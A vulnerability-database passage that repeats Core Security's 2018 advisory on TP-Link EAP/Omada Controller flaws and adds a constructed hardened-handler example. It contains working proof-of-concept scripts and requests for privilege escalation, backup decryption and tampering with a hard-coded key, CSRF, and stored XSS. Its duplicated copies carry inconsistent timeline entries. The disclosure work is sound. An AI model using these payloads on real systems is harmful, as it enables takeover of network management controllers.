= r"C:\fake_path\patched_backup_from_observer.cfg" encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape') h = codecs.open(path_to_write, "w", encoding='utf-8') h.write(encrypt_patched_backup) h.close() #upload patched backup file files = {'file': open(path_to_write, 'rb')} restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False) -----/ 7.3. Proof of concept to create an Administrator User /----- POST /user/addUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa Connection: close Upgrade-Insecure-Requests: 1 name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator -----/ 7.4. **Cross-Site Scripting in the creation of a local User** [CVE-2018-10165] The following parameter of the local user creation is vulnerable to a stored Cross Site Scripting: userName The following is a proof of concept to demonstrate the vulnerability: /----- POST /hotspot/localUser/saveUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en Connection: close Upgrade-Insecure-Requests: 1 userName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=123456 -----/ 7.5. 
**Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164] The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting. Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB) In the following example we encode "<script>alert(1)</script>" in base64, the results is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" so we replace the fileData with the code and restore the backup file. /----- <picturefiles> <file> <fileId>5a383b962dc07622f0bdc101</fileId> <fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData> </file> </picturefiles> -----/ To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example). 8. **Report Timeline** 2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send draft advisory. 2018-01-14: TP-Link answered asking for the advisory in clear text. 2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form. 2018-01-29: TP-Link informed Core Security they checked the draft advisory and they are going to fix the vulnerabilities. 2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and request an estimated release date for the fix. 2018-02-07: TP-Link informed that they were working in a beta version of the fix and they will provide it to Core Security for test. 2018-02-07: Core Security thanked TP-Link's answer and asked for a tentative date for this beta version. Also, Core Security asked for a tentative release date for the fix. 2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again. 2018-03-01: Core Security thanked TP-Link's answer and requested for a regular contact till the release of the fixed version. 
2018-03-19: Core Security requested a status update. 2018-03-21: TP-Link confirmed that the new version will be available in early April. 2018-03-26: Core Security thanked TP-Link's reply an asked for a solidified release date. 2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities. 2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed. 2018-04-17: Core Security set release date to be May 3rd at 12 PM EST. 9. **References** [1] https://www.tp-link.com/en/products/details/EAP-Controller.html. [2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software. 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. 
Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. **PGP/GPG Keys** This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
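The root cause shared by 7.1 and 7.3 is that the controller authenticated the caller but never authorized the request: the GUI hid the forms from observers, the API accepted them from any session, and no session-bound token tied a form post to the page that rendered it. The following constructed Python model (added here; not code from the advisory or from TP-Link) shows a /user/addUser handler in that vulnerable shape beside a hardened one that decides the role from the server-side session, verifies a session-bound anti-CSRF token and checks Origin. The Controller, Session and Request classes and the csrfToken form field are assumptions made for illustration.

```python
"""Server-side authorization and anti-CSRF checks for a user-creation
endpoint, modelled on the /user/addUser request quoted in the advisory.
Constructed example: the Controller, Session and Request classes and the
csrfToken form field are assumptions, not the product's own code."""
import hmac
import secrets
from dataclasses import dataclass, field

ROLE_OBSERVER = "observer"
ROLE_ADMIN = "administrator"
ALLOWED_ROLES = {ROLE_OBSERVER, ROLE_ADMIN}


@dataclass
class Session:
    user: str
    role: str  # the caller's role lives here, server-side, never in the form
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    cookies: dict
    form: dict
    origin: str = ""  # Origin header as the browser would send it


class Controller:
    """Minimal stand-in for the management web app: sessions and a user table."""

    def __init__(self, origin="https://controller.example:8043"):
        self.origin = origin
        self.sessions = {}  # TPEAP_SESSIONID value -> Session
        self.users = {}     # user name -> role

    def login(self, user, role):
        sid = secrets.token_hex(16)
        self.sessions[sid] = Session(user, role)
        return sid

    def _session(self, req):
        return self.sessions.get(req.cookies.get("TPEAP_SESSIONID"))

    def add_user_vulnerable(self, req):
        """The shape behind 7.1 and 7.3: the caller is authenticated but never
        authorized, the new user's role is whatever the form says, and any
        cross-site post that carries the cookie is accepted."""
        sess = self._session(req)
        if sess is None:
            return 401
        self.users[req.form["name"]] = req.form["roleName"]
        return 200

    def add_user_hardened(self, req):
        """Authorization from the session role, a session-bound CSRF token,
        an Origin check, and a server-side allow-list for the new role."""
        sess = self._session(req)
        if sess is None:
            return 401
        if sess.role != ROLE_ADMIN:
            return 403  # observers cannot reach the API even if the GUI hid it
        token = req.form.get("csrfToken", "")
        if not hmac.compare_digest(token, sess.csrf_token):
            return 403  # a foreign page cannot read the token, so it cannot forge this
        if req.origin and req.origin != self.origin:
            return 403
        role = req.form.get("roleName", "")
        if role not in ALLOWED_ROLES:
            return 400
        self.users[req.form["name"]] = role
        return 200


def demo():
    """Replays the advisory's two scenarios against both handlers and returns
    the status codes plus the resulting user table."""
    app = Controller()
    obs_sid = app.login("observer1", ROLE_OBSERVER)
    admin_sid = app.login("admin", ROLE_ADMIN)
    # Constructed form with the same fields as the 7.1 PoC.
    escalate = {"name": "coresecurity", "roleName": ROLE_ADMIN, "password": "123456"}

    observer_req = Request({"TPEAP_SESSIONID": obs_sid}, escalate)
    vuln = app.add_user_vulnerable(observer_req)  # 200: an observer created an admin
    hard = app.add_user_hardened(observer_req)    # 403

    # 7.3 shape: the victim admin's browser attaches the cookie automatically
    # when an attacker-controlled page submits the form, but carries no token.
    csrf_req = Request({"TPEAP_SESSIONID": admin_sid}, escalate, origin="http://127.0.0.1:5000")
    csrf = app.add_user_hardened(csrf_req)        # 403

    # Legitimate admin request from the app's own page, token included.
    good_form = dict(escalate, csrfToken=app.sessions[admin_sid].csrf_token)
    ok = app.add_user_hardened(Request({"TPEAP_SESSIONID": admin_sid}, good_form, origin=app.origin))  # 200
    return vuln, hard, csrf, ok, dict(app.users)


if __name__ == "__main__":
    print(demo())
```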
VAR-201805-0362 CVE-2018-10168 TP-Link EAP Controller and Omada Controller Vulnerabilities related to authorization, permissions, and access control CVSS V2: 6.5
CVSS V3: 8.8
Severity: HIGH
TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows do not control privileges for usage of the Web API, allowing a low-privilege user to make any request as an Administrator. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller contain vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). TP-Link EAP Controller and Omada Controller are software used by TP-Link to remotely manage wireless access point (AP) devices. This vulnerability stems from the program's failure to control the use of the Web API. An attacker could exploit the vulnerability to send a request as an administrator. TP-Link EAP Controller and Omada Controller are prone to the following security vulnerabilities:

1. A privilege-escalation vulnerability
2. A hard-coded cryptographic key vulnerability
3. A cross-site request-forgery vulnerability
4. Multiple HTML-injection vulnerabilities

An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

1. **Advisory Information**
Title: TP-Link EAP Controller Multiple Vulnerabilities
Advisory ID: CORE-2018-0001
Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities
Date published: 2018-05-03
Date of last update: 2018-04-17
Vendors contacted: TP-Link
Release mode: Coordinated release

2. **Vulnerability Information**
Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164

3. **Vulnerability Description**
It allows you to centrally manage your EAP devices using a Web browser. Vulnerabilities were found in the EAP Controller management software, allowing privilege escalation due to improper privilege management in the Web application. Due to the use of a hard-coded cryptographic key the backup file of the Web application can be decrypted, modified and restored back. Also, the Web application does not have Cross-Site Request Forgery protection and finally, two stored Cross Site Scripting vulnerabilities were found.

4. **Vulnerable Packages**
. TP-Link EAP Controller_V2.5.4_Windows
. TP-Link Omada Controller_V2.6.0_Windows
Other products and versions might be affected, but they were not tested.

5. **Vendor Information, Solutions and Workarounds**
TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues.

6. **Credits**
This vulnerability was discovered and researched by Julian Muñoz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team.

7. **Technical Description / Proof of Concept Code**
TP-Link EAP Controller doesn't have any role control on the Web app API; only the application GUI seems to restrict low level users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. In 7.2 we show that the software uses a hardcoded key to encrypt the Web application's backup file. An attacker possessing such key and knowing the encryption algorithm could decrypt and modify the backup file. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. In 7.3 we show that the application does not have any Cross-Site Request Forgery protection, giving an attacker the possibility of forcing an end user to execute unwanted actions on the EAP Controller in which the victim is currently authenticated. Finally, we discovered two Cross-Site Scripting vulnerabilities, one in the creation of a local user in the parameter userName (7.4) and the other abusing the implementation of portalPictureUpload (7.5).

7.1. **Privilege escalation from Observer to Administrator** [CVE-2018-10168]
The software does not control privileges on the usage of the Web API, allowing a low privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user):

/-----
import requests

session = requests.Session()
session.trust_env = False
tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa"  #observer session_id
cookie = {'TPEAP_SESSIONID': tpeap_session_id}
data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"}
#create user
create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False)
-----/

The roleId parameter can be discovered in 7.2 by decrypting the backup file.

7.2. **Download, Decrypt and Restore the web app backup file** [CVE-2018-10167]
As described, the Web API does not restrict low privilege users, so an observer can make a request to download the web app backup file. The following xml is part of the decrypted backup file; modifying those fields would give us control over the EAP device since we can inject a user and password for the user account and enable SSH on the device.

/-----
<useraccount>
{
  "id" : "5a09fad8bb62eef169069ad3",
  "userName" : "attacker",
  "password" : "1234567",
  "site" : "Default",
  "key" : "userAccount"
}
</useraccount>
<ssh>
{
  "id" : "59fb411fbb62eef169069ac7",
  "sshserverPort" : 22,
  "sshenable" : true,
  "site" : "Default",
  "key" : "ssh"
}
</ssh>
-----/

The following code shows how this process is done, using an observer's session_id. First we get the backup file, decrypt it using the hard-coded key, then we modify it and finally upload it back to the server.

/-----
# -*- coding: utf-8 -*-
# Python 2 code as published (unicode(), list-returning map() and range())
import requests
import codecs

key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \
      "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \
      "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX"


def init_key(secret_key):
    # key-scheduling step: permute 0..255 under the hard-coded key
    key_in_bytes = map(ord, secret_key)
    number_list = range(0, 256)
    j = 0
    for i, val in enumerate(number_list):
        j = j + number_list[i] + key_in_bytes[i] & 0xFF
        temp = number_list[i]
        number_list[i] = number_list[j]
        number_list[j] = temp
    return number_list


def encrypt(data, key):
    # XOR keystream cipher; the same routine decrypts
    key = init_key(key)
    input = [x for x in data]
    output = []
    for x, elem in enumerate(data):
        i = 0
        j = 0
        i = (i + 1) % 256
        j = (j + key[i]) % 256
        temp = key[i]
        key[i] = key[j]
        key[j] = temp
        t = (key[i] + key[j] % 256) % 256
        iY = key[t]
        iCY = iY
        output.append(chr(ord(input[x]) ^ iCY))
    ret = ''.join(output)
    return ret


session = requests.Session()
session.trust_env = False
tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa"
cookie = {'TPEAP_SESSIONID': tpeap_session_id}
#get backup file
get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False)
#decrypt backup file
decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key)
#modify decrypted backup file
patched_backup = decrypted_backup.replace('normaluser', 'attacker')
#encrypt the file and save it
path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg"
encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape')
h = codecs.open(path_to_write, "w", encoding='utf-8')
h.write(encrypt_patched_backup)
h.close()
#upload patched backup file
files = {'file': open(path_to_write, 'rb')}
restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False)
-----/

7.3. **Lack of Cross-Site Request Forgery Protection** [CVE-2018-10166]
There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attack-controlled domain. Proof of concept to create an Administrator User:

/-----
POST /user/addUser HTTP/1.1
Host: EAP_CONTROLER_IP:8043
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5000/xss
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa
Connection: close
Upgrade-Insecure-Requests: 1

name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator
-----/

7.4. **Cross-Site Scripting in the creation of a local User** [CVE-2018-10165]
The following parameter of the local user creation is vulnerable to a stored Cross Site Scripting: userName
The following is a proof of concept to demonstrate the vulnerability:

/-----
POST /hotspot/localUser/saveUser HTTP/1.1
Host: EAP_CONTROLER_IP:8043
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5000/xss
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Cookie: TPEAP_LANGUAGE=en
Connection: close
Upgrade-Insecure-Requests: 1

userName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=123456
-----/

7.5. **Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164]
The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting. Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB). In the following example we encode "<script>alert(1)</script>" in base64, the result is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==", so we replace the fileData with the code and restore the backup file.

/-----
<picturefiles>
<file>
<fileId>5a383b962dc07622f0bdc101</fileId>
<fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData>
</file>
</picturefiles>
-----/

To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example).

8. **Report Timeline**
2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send the draft advisory.
2018-01-14: TP-Link answered asking for the advisory in clear text.
2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form.
2018-01-29: TP-Link informed Core Security they checked the draft advisory and they are going to fix the vulnerabilities.
2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and requested an estimated release date for the fix.
2018-02-07: TP-Link informed that they were working on a beta version of the fix and they will provide it to Core Security for testing.
2018-02-07: Core Security thanked TP-Link's answer and asked for a tentative date for this beta version.
2018-02-19: Core Security tested the beta version and verified that all the vulnerabilities were fixed. Also, Core Security asked for a tentative release date for the fix.
2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again.
2018-03-01: Core Security thanked TP-Link's answer and requested regular contact until the release of the fixed version.
2018-03-19: Core Security requested a status update.
2018-03-21: TP-Link confirmed that the new version will be available in early April.
2018-03-26: Core Security thanked TP-Link's reply and asked for a solidified release date.
2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities.
2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed.
2018-04-17: Core Security set release date to be May 3rd at 12 PM EST.

9. **References**
[1] https://www.tp-link.com/en/products/details/EAP-Controller.html
[2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software

10. **About CoreLabs**
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. **About Core Security**
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com

12. **Disclaimer**
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. **PGP/GPG Keys**
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
VAR-201805-0361 CVE-2018-10167 TP-Link EAP Controller and Omada Controller Vulnerabilities related to the use of hard-coded credentials CVSS V2: 6.0
CVSS V3: 7.5
Severity: HIGH
The web application backup file in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows is encrypted with a hard-coded cryptographic key, so anyone who knows that key and the algorithm can decrypt it. A low-privilege user could decrypt and modify the backup file in order to elevate their privileges. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkEAPController and OmadaController are software used by TP-LINK to remotely control wireless AP access point devices. A security vulnerability exists in the TP-LinkEAPController and the OmadaController 2.5.4_Windows version and the 2.6.0_Windows version of the web application backup file. The vulnerability is caused by the program encrypting with a hard-coded encryption key. TP-Link EAP Controller and Omada Controller are prone to the following security vulnerabilities: 1. A privilege-escalation vulnerability 2. A cross-site request-forgery vulnerability 4. Multiple HTML-injection vulnerability An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. The following products and versions are vulnerable: TP-Link EAP Controller 2.5.4 and 2.6.0 TP-Link Omada Controller 2.5.4 and 2.6.0. **Advisory Information** Title: TP-Link EAP Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0001 Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities Date published: 2018-05-03 Date of last update: 2018-04-17 Vendors contacted: TP-Link Release mode: Coordinated release 2. 
**Vulnerability Information** Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164 3. It allows you to centrally manage your EAP devices using a Web browser. Vulnerabilities were found in the EAP Controller management software, allowing privilege escalation due to improper privilege management in the Web application. Also, the Web application does not have Cross-Site Request Forgery protection and finally, two stored Cross Site Scripting vulnerabilities were found. 4. **Vulnerable Packages** . TP-Link EAP Controller_V2.5.4_Windows . TP-Link Omada Controller_V2.6.0_Windows Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues. 6. **Credits** This vulnerability was discovered and researched by Julian MuA+-oz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team. 7. **Technical Description / Proof of Concept Code** TP-Link EAP Controller doesn't have any role control on the Web app API, only the application GUI seems to be restricting low lever users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. 
On 7.3 we show the application does not have any Cross-Site Request Forgery Protection giving an attacker the possibility of forcing an end user to execute any unwanted actions on the EAP Controller in which the victim is currently authenticated. Finally, we discovered two Cross-Site Scripting, one on the creation of a local user in the parameter userName (7.4) and the other one abusing the implementation of portalPictureUpload (7.5). 7.1. **Privilege escalation from Observer to Administrator** [CVE-2018-10168] The software does not control privileges on the usage of the Web API, allowing a low privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user): /----- import requests session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" #observer session_id cookie = {'TPEAP_SESSIONID': tpeap_session_id} data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"} #create user create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False) -----/ The roleId parameter can be discovered in 7.2 by decrypting the backup file. The following xml is part of the decrypted backup file, modifying those fields would give us control over the EAP device since we can inject a user and password for the user account and enable SSH on the device. /----- <useraccount> { "id" : "5a09fad8bb62eef169069ad3", "userName" : "attacker", "password" : "1234567", "site" : "Default", "key" : "userAccount" } </useraccount> <ssh> { "id" : "59fb411fbb62eef169069ac7", "sshserverPort" : 22, "sshenable" : true, "site" : "Default", "key" : "ssh" } </ssh> -----/ The following code shows how this process is done, using an observer's session_id. 
/-----
# -*- coding: utf-8 -*-
# Python 2 script (uses unicode() and list-returning map()/range())
import requests
import codecs

# hardcoded 256-character key used by the EAP Controller for backup files
key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \
      "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \
      "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX"


def init_key(secret_key):
    # RC4-style key scheduling: permute 0..255 with the key bytes
    key_in_bytes = map(ord, secret_key)
    number_list = range(0, 256)
    j = 0
    for i, val in enumerate(number_list):
        j = j + number_list[i] + key_in_bytes[i] & 0xFF
        temp = number_list[i]
        number_list[i] = number_list[j]
        number_list[j] = temp
    return number_list


def encrypt(data, key):
    # XOR-based stream cipher, so the same function also decrypts.
    # Note: i and j are reset for every byte, which differs from standard
    # RC4; kept exactly as published so the output matches the product.
    key = init_key(key)
    input = [x for x in data]
    output = []
    for x, elem in enumerate(data):
        i = 0
        j = 0
        i = (i + 1) % 256
        j = (j + key[i]) % 256
        temp = key[i]
        key[i] = key[j]
        key[j] = temp
        t = (key[i] + key[j] % 256) % 256
        iY = key[t]
        iCY = iY
        output.append(chr(ord(input[x]) ^ iCY))
    ret = ''.join(output)
    return ret


session = requests.Session()
session.trust_env = False
tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa"
cookie = {'TPEAP_SESSIONID': tpeap_session_id}

# get backup file
get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup',
                                  cookies=cookie, verify=False)

# decrypt backup file
decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key)

# modify decrypted backup file
patched_backup = decrypted_backup.replace('normaluser', 'attacker')

# encrypt the file and save it
path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg"
encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape')
h = codecs.open(path_to_write, "w", encoding='utf-8')
h.write(encrypt_patched_backup)
h.close()

# upload patched backup file
files = {'file': open(path_to_write, 'rb')}
restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore',
                                       files=files, cookies=cookie, verify=False)
-----/

7.3. **Lack of Cross-Site Request Forgery Protection** [CVE-2018-10166]

There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. Proof of concept to create an Administrator user:

/-----
POST /user/addUser HTTP/1.1
Host: EAP_CONTROLER_IP:8043
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5000/xss
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa
Connection: close
Upgrade-Insecure-Requests: 1

name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator
-----/

7.4. **Cross-Site Scripting in the creation of a local User** [CVE-2018-10165]

The following parameter of the local user creation is vulnerable to a stored Cross-Site Scripting: userName. The following is a proof of concept to demonstrate the vulnerability:

/-----
POST /hotspot/localUser/saveUser HTTP/1.1
Host: EAP_CONTROLER_IP:8043
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5000/xss
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Cookie: TPEAP_LANGUAGE=en
Connection: close
Upgrade-Insecure-Requests: 1

userName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=123456
-----/

7.5. **Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164]

